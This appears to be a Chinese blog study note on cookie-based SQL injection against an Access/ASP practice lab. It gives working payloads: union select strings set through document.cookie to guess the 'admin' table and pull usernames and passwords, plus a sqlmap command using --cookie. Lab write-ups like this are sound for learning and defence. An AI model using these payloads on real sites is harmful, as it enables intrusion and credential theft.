Access-Cookie注入(笔记)

cookie注入的本质

当某个get或post里的参数存在sql注入,但是被过滤了很多sql函数无法进行注入,如果不是用GET或POST进行传参用的是$_REQUEST函数来传参,REQUEST支持get,post,cookie传参(php 5.4以上版本不在支持cookie传参),如果只对get和post进行了过滤,而cookie的传参并没有过滤,那么就会产生危害,相当于无任何防护。
cookie注入的核心是传参的方式不同

如:
这是一个cookie注入的靶场
在这里插入图片描述
常规流程 -1测试是否存在注入,页面产生了改变证明跟数据库产生了交互
在这里插入图片描述
输入 and -1=-1 发现被过滤无法进行注入
在这里插入图片描述
尝试cookie注入,删除后面的传参页面报错
在这里插入图片描述

f12打开控制台
在这里插入图片描述
在cookie管理里输入刚才删除的参数id=171
在这里插入图片描述刷新页面,页面正常,可以使用cookie传参
在这里插入图片描述
看看有没有注入,cookie注入需要将输入的内容url编码
在这里插入图片描述

and 1=1 页面正常
在这里插入图片描述

and 1=2 页面报错,存在注入

在这里插入图片描述每次输入都需要url编码会很繁琐,可以使用javascript来设置cookie

document.cookie=“id=”+escape(“171”)
escape是一个编码函数,这个函数会进行一次url编码
在这里插入图片描述

order by查看字段
存在10个字段
在这里插入图片描述
查看回显字段
access没有系统自带表,,需要强猜表名常见表名 user admin

document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")

在这里插入图片描述猜字段

document.cookie="id="+escape("171 union select 1,username,3,4,5,6,7,8,9,10 from admin")

在这里插入图片描述

document.cookie="id="+escape("171 union select 1,username,password,4,5,6,7,8,9,10 from admin")

在这里插入图片描述拿到后台登陆账号密码
在这里插入图片描述
在这里插入图片描述
sqlmap跑cookie注入

python sqlmap.py -u "http//:www.fff.com/123.asp" --cookie "id=171" --level 2
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值